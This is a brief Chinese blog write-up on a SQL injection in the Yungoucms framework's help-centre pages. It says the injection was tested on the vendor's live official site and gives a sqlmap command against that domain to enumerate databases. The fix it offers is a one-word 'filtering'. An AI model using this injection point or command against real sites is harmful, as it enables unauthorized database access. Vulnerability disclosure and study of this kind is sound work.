Yungoucms商业框架sql注入及修复 – 网站安全 – 自学

时间: 2020-10-10|tag: 63次围观|0 条评论

这里用Yungoucms商业框架的官方前台http://www.yungoucms.cn做测试。   该注入点位于帮助中心的任一页面,   比如http://www.yungoucms.cn/help/1   加',报错   Yungoucms商业框架sql注入及修复 – 网站安全 – 自学插图   请出sqlmap   这是一个伪静态页面,直接加*跑数据   python sqlmap.py -u "http://www.yungoucms.cn/help/1*" --dbs   Yungoucms商业框架sql注入及修复 – 网站安全 – 自学插图1
Yungoucms商业框架sql注入及修复 – 网站安全 – 自学插图2
修复方案: 过滤
    上一篇: 74cms逻辑漏洞导致sql注入及修复2 - 网站安全 - 自

    下一篇: PHPCMS组合技进行CSRF攻击 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《Yungoucms商业框架sql注入及修复 – 网站安全 – 自学
   

还没有人抢沙发呢~